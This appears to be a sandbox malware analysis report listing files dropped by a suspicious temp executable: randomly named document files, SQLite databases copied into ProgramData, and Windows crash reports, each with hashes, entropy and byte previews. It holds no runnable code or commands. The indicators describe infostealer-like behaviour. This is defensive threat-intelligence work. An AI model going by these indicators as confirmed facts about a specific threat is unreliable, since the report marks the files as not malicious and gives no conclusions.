Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\ProgramData\EFOYFBOLXA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\ProgramData\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\ProgramData\FIJJKECFCFBGDHIECAAFIIDAKK

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIJEGDAKEHJECAKEGDHJDHDAFH

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJJJECFIECBGDGCAAAEH

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDHJKKFBAEGDGDGCBKECBGCGCF

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKJDBAAAEHIEGCAKFHCGDHIEGD

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KEGDAKEHJDHIDHJJDAEC

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFCAFIID

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsn5FE8.tmp.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_16E6.exe_1175301da8f3c47095daf6c68ba0cd5dca69d4fc_8f3ca00b_1c46bad7-4cf2-43e4-be89-b06da9f6bd38\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8856146145113617
Encrypted:	false
SSDEEP:	96:CSeUnmoUHashHuoA7JfdQXIDcQnc6rCcEhcw3rz+HbHg/8BRTf3o8Fa9OyRgxPXA:TnlMaO056rIj/FwzuiFAZ24IO8RD
MD5:	9752B443BE167565F08B544F01F06545
SHA1:	CFDE2A6E05F80AFA74BCF88A73B524988AFBE542
SHA-256:	F7B0B3A15B635E9B96ED7BC15DDEA49A54F197CCBC8D703FBA167156B312E882
SHA-512:	B6D6CFDE470EC21F2320B09660E5269F570055462B6885AD5FF35B02BF954F83B103CCC1CEC646BFA6BEBD0A6FAB2B4676BE8765BFF1FD6EDEF6D5307C4FAF40
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.7.8.8.4.6.7.2.3.4.3.5.8.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.4.6.b.a.d.7.-.4.c.f.2.-.4.3.e.4.-.b.e.8.9.-.b.0.6.d.a.9.f.6.b.d.3.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.9.7.e.0.7.4.-.c.8.4.a.-.4.e.b.4.-.8.d.1.a.-.b.c.6.a.1.6.c.d.c.0.0.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.6.E.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.d.c.-.0.0.0.1.-.0.0.1.4.-.4.c.0.0.-.6.9.c.7.4.d.3.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.5.9.b.6.2.b.a.d.7.c.c.b.d.9.a.2.6.4.5.4.c.4.a.4.b.9.7.1.1.f.b.0.0.0.0.6.d.0.1.!.0.0.0.0.9.c.4.6.7.4.5.4.6.2.6.6.4.7.3.5.e.d.5.8.e.1.3.a.a.a.6.b.0.1.6.2.1.2.e.9.d.f.3.0.!.1.6.E.6...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.2././.2.2.:.1.7.:.4.8.:.5.2.!.0.!.1.6.E.6...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_16E6.exe_1175301da8f3c47095daf6c68ba0cd5dca69d4fc_8f3ca00b_28218ba2-cd7d-437c-88d0-c7cb8790c045\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9427081623836057
Encrypted:	false
SSDEEP:	96:KkmoUHCZshHuoA7JfdQXIDcQnc6rCcEhcw3rz+HbHg/8BRTf3o8Fa9OyRgxPXUoW:blMyO056rIj/FQzuiFAZ24IO8RD
MD5:	36D510CD5F3606CEF3C204633662ABC9
SHA1:	2C54C3732D5A982488BC0958B2C63A55CB4EE9DE
SHA-256:	DD429A4664D81D4F5512A0DB92A3C88C8BE7357744F15C0DDFC1E9B8ED74CB81
SHA-512:	86406D0E4DC197664A4FBAB1E27704B2072E3254C5FB49CC13493E294270DDD13AEBFE303C253E976EBB7AA3A4BE543661BCDC81F518F68E18E27596B2E6E080
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.7.8.8.4.6.7.4.6.7.0.2.6.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.2.1.8.b.a.2.-.c.d.7.d.-.4.3.7.c.-.8.8.d.0.-.c.7.c.b.8.7.9.0.c.0.4.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.c.7.8.d.2.5.-.5.c.4.d.-.4.6.b.c.-.9.6.5.3.-.0.f.5.b.0.0.1.f.1.e.7.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.6.E.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.d.c.-.0.0.0.1.-.0.0.1.4.-.4.c.0.0.-.6.9.c.7.4.d.3.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.5.9.b.6.2.b.a.d.7.c.c.b.d.9.a.2.6.4.5.4.c.4.a.4.b.9.7.1.1.f.b.0.0.0.0.6.d.0.1.!.0.0.0.0.9.c.4.6.7.4.5.4.6.2.6.6.4.7.3.5.e.d.5.8.e.1.3.a.a.a.6.b.0.1.6.2.1.2.e.9.d.f.3.0.!.1.6.E.6...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.2././.2.2.:.1.7.:.4.8.:.5.2.!.0.!.1.6.E.6...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_16E6.exe_1175301da8f3c47095daf6c68ba0cd5dca69d4fc_8f3ca00b_33baf902-cbe5-4da7-af94-345e8169f267\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8858423302760643
Encrypted:	false
SSDEEP:	96:V/moUHwshHuoA7JfdQXIDcQnc6rCcEhcw3rz+HbHg/8BRTf3o8Fa9OyRgxPXUoN8:FlMwO056rIj/FwzuiFAZ24IO8RD
MD5:	EF1BC0E9DF388DC40ECC292E1B130781
SHA1:	4C58CF576CB8653CCC0AD782B4660224418B70D1
SHA-256:	BDBC34001FD1B229D13D4A24C67E3CDD41D80D9F4759CDB0844BC4B7A30DA983
SHA-512:	2DEF302F12372DA3A794573F3EC821E02D584E53F980847927392199D6E8C86BC1DBECBE2203BB97F11BCB901CAC802B053757F8ABA0F5EB98D6D0425DD17A1C
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.7.8.8.4.6.7.0.5.2.1.1.8.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.b.a.f.9.0.2.-.c.b.e.5.-.4.d.a.7.-.a.f.9.4.-.3.4.5.e.8.1.6.9.f.2.6.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.e.a.6.5.7.b.-.7.3.7.0.-.4.7.5.3.-.9.5.0.e.-.8.4.8.5.a.3.0.6.2.9.7.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.6.E.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.d.c.-.0.0.0.1.-.0.0.1.4.-.4.c.0.0.-.6.9.c.7.4.d.3.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.5.9.b.6.2.b.a.d.7.c.c.b.d.9.a.2.6.4.5.4.c.4.a.4.b.9.7.1.1.f.b.0.0.0.0.6.d.0.1.!.0.0.0.0.9.c.4.6.7.4.5.4.6.2.6.6.4.7.3.5.e.d.5.8.e.1.3.a.a.a.6.b.0.1.6.2.1.2.e.9.d.f.3.0.!.1.6.E.6...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.2././.2.2.:.1.7.:.4.8.:.5.2.!.0.!.1.6.E.6...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_16E6.exe_1175301da8f3c47095daf6c68ba0cd5dca69d4fc_8f3ca00b_77793363-fcd6-4200-92f4-814dbf36877f\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8860411337573663
Encrypted:	false
SSDEEP:	96:0k/NgmoUHRshHuoA7JfdQXIDcQnc6rCcEhcw3rz+HbHg/8BRTf3o8Fa9OyRgxPXA:XglMRO056rIj/FwzuiFAZ24IO8RD
MD5:	865AD7B81FB01A1EA4B63FC0B19FB17A
SHA1:	F3114EA70F4C55C1E76E3F6A576D1E32FECE854E
SHA-256:	2C0773AE6F58C70757E492BDA46513DCBA5BB73B55207164643F04B9C4D8DD0E
SHA-512:	C816607933888E65C0D17C5F6716CEBA7B468B8070D79F63B202B47CEDBE7E7F90A28650ED8F161DB01ECEF4DA28AD00C7090C5DCA511CADBBA551EDD235E8CC
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.7.8.8.4.6.6.7.4.5.3.9.8.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.7.9.3.3.6.3.-.f.c.d.6.-.4.2.0.0.-.9.2.f.4.-.8.1.4.d.b.f.3.6.8.7.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.7.6.6.7.9.4.-.b.b.b.2.-.4.1.9.9.-.b.f.1.f.-.6.b.d.6.5.1.e.f.8.3.b.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.6.E.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.d.c.-.0.0.0.1.-.0.0.1.4.-.4.c.0.0.-.6.9.c.7.4.d.3.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.5.9.b.6.2.b.a.d.7.c.c.b.d.9.a.2.6.4.5.4.c.4.a.4.b.9.7.1.1.f.b.0.0.0.0.6.d.0.1.!.0.0.0.0.9.c.4.6.7.4.5.4.6.2.6.6.4.7.3.5.e.d.5.8.e.1.3.a.a.a.6.b.0.1.6.2.1.2.e.9.d.f.3.0.!.1.6.E.6...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.2././.2.2.:.1.7.:.4.8.:.5.2.!.0.!.1.6.E.6...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5AAB.exe_7d31ec9ff3f37afe9caf6d47a5a09ad78d8c33_62e0016a_7bb65338-9356-462d-9521-2eeaa3e2225c\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7367673749041604
Encrypted:	false
SSDEEP:	96:9b+SFxOJDQZsSP3o37JfmQXIDcQgc6ccEscw3abP+HbHg/8BRTf3o8Fa9OyRgTd1:Z10DQZg0+YWNj/0zuiFAZ24IO8ZA
MD5:	22B50BBC7DCBDCC5BEC6E796316926AC
SHA1:	0B8CC13D7E4CB6CD9716FFFACF98A2CEE7E54D51
SHA-256:	A86FA1BAF65A6D340A895427BA064EEBFE927CA6C5DA8E51E9FC43D20CCB8D75
SHA-512:	92228488AB773345117609E6A6AFF59355987D043F286300D7A69199E5ECCC6E6687B2153AED6333D975F73B194F57F1C2DD1421F212FA67F6C466D0AB83E52A
Malicious:	false
